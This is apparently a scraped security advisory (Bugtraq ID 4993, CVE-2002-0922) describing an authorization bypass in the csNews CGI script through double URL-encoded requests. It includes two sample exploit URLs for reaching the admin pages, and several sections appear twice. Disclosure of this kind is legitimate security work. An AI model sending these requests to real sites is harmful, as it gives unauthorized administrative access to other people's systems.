CGIScript.net csNews Double URL Encoding Unauthorized Administrative Access Vulnerability
BID:4993
Info
CGIScript.net csNews Double URL Encoding Unauthorized Administrative Access Vulnerability
| Bugtraq ID: | 4993 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-0922 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 11 2002 12:00AM |
| Updated: | Jul 11 2009 01:56PM |
| Credit: | Discovery is credited to Steve Gustin <[email protected]>. |
| Vulnerable: |
CGISCRIPT.NET csNews Professional 1.0 CGISCRIPT.NET csNews 1.0 |
| Not Vulnerable: | |
Discussion
CGIScript.net csNews Double URL Encoding Unauthorized Administrative Access Vulnerability
csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.
Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting a HTTP request in which some metacharacters are double URL encoded.
csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.
Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting a HTTP request in which some metacharacters are double URL encoded.
Exploit / POC
CGIScript.net csNews Double URL Encoding Unauthorized Administrative Access Vulnerability
The following sample exploits have been provided by Steve Gustin <[email protected]>:
CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager
The following sample exploits have been provided by Steve Gustin <[email protected]>:
CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager
Solution / Fix
CGIScript.net csNews Double URL Encoding Unauthorized Administrative Access Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.